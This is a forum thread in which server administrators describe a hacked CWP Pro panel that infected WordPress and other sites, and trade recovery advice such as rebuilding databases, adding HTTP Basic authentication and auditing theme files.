While we're actively performing cleanup operations, the critical question remains: Has this vulnerability truly been resolved by the "silent patch"?

Do you have any informations about when end what version of the patch/update ?

Best regards,

I've studied the vulnerability and I don't expect it to be able to exploit anything else. The attacker only had access as a low privileges users. If he had so much access, he wouldn't be mass exploiting every website of your server.
I recommend you to change your admin and client ports. This way, automated systems won't be able to find it right away.
If you want to be extra serious about it, format it. Don't take my word too serious but I see no reason to format. Never the less, always keep a clean backup.
I've added "HTTP Basic access authentication" to admin and client panels. I've also added this to wordpress login url's. This will block every public access and it creates a new layer of protection. I saw that my firewall got less blockage because there were no possibility for hackers to make requests. Every page, request or URL have been blocked with this. It works like a master password on sensible areas that is requested before opening or requesting anything.

My wordpress websites also infeted. And other websites non worpress also. Replaced index.php, added  licelic.c" backup.c defauit.php. I found admin accounts in database WP-user wpadmin@volovmart.ru. I dont know how its happened. But i think it is Panel hacked because it is not effect  only WordPress CMS. Im using CWP pro.

I believe Wordpress database was infected by external code execution. I also had this user and same email.
You should rebuild your wordpress from scratch. Best way is to firstly remove that user (with the wordpress panel). You can also execute queries to remove the user and the content he has created (if present).
Then import only this tables:
wp_users
wp_usermeta
wp_terms
wp_term_taxonomy
wp_posts
wp_postmeta

If your wordpress has user comments, also import:
wp_comments
wp_commentmeta

Then install all plugins from the installation menu (don΄t import from the infected website). Everything has to be built again. Wordpress plugins creates a lot of tables that are not even needed. But be aware and test your website afterwards.

If you had made changes to your template before, install the template from the installation menu and take a deep look on each file you had modified. If done right, you probably you have a child folder for that theme. Take a deep look on each line of code of those modified files to see if something was injected. I did that manually and then i asked chatgpt if there were any malicious line of code just to confirm it.
If you have custom plugins, you have to take a deep look on each line of code as well.